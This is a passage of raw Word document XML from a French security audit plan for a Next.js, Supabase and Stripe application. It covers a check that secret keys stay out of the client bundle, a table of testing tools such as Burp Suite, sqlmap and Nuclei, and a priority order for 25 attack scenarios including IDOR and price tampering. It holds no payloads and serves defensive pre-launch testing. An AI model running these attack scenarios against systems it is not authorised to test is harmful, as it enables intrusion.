          <w:bCs/>
          <w:color w:val="228B22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultat attendu (si securise) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Next.js ne sert pas les fichiers .env. Seules les variables prefixees NEXT_PUBLIC_ sont embedees dans le bundle client. Verifier que STRIPE_SECRET_KEY, SUPABASE_SERVICE_ROLE_KEY, RESEND_API_KEY ne sont PAS prefixees NEXT_PUBLIC_.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Fichiers a verifier :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- .env.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- next.config.mjs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Outils de test recommandes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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gridCol w:w="164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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Gratuit</w:t>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Burp Suite Community</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Intercepter et modifier les requetes HTTP. Indispensable pour les tests IDOR, price tampering, injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>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OWASP ZAP</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Scanner automatique de vulnerabilites web. Detecte XSS, injection, headers manquants.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>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Stripe CLI</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Tester les webhooks en local : stripe listen --forward-to localhost:3000/api/webhooks/stripe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>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DevTools (Chrome/Firefox)</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Inspecter les requetes, cookies, headers, code source. Premier outil de test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>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curl / httpie</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Envoyer des requetes manuelles. Tester les edge cases, les payloads malformes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>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Nuclei</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Scanner de vulnerabilites avec des templates. Detecte les misconfigs, les CVE connus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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sqlmap</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Test automatique d'injection SQL. Meme si Supabase parametrise, bon de verifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Ordre de test recommande</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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244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Priorite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Temps estime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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1 - Urgent</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SC-01 (IDOR), SC-02 (Privilege), SC-03 (Prix), SC-05 (Service Key), SC-21 (RLS), SC-25 (Env vars)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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1-2 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2 - Important</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SC-06 (Rate limit), SC-07 (Webhook replay), SC-08 (Upload), SC-09 (XSS), SC-22 (Anon key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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1-2 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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3 - Moyen</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SC-10 (Clickjack), SC-11 (Enum), SC-12 (Session), SC-13 (Brute force), SC-14 (Orders), SC-16 (DoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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1 jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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4 - Bas</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SC-15 (Trial abuse), SC-17 (Info disclosure), SC-18 (CSRF), SC-19 (Email enum), SC-20 (Token), SC-23 (Scraping)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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0.5 jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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5 - Infra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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SC-24 (DDoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Selon budget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Document genere le 17 mars 2026. 25 scenarios - A executer avant mise en production.</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ATTABL - Audit Securite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A1A2E"/>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2026-03-16T23:32:37.957Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-16T23:32:38.003Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>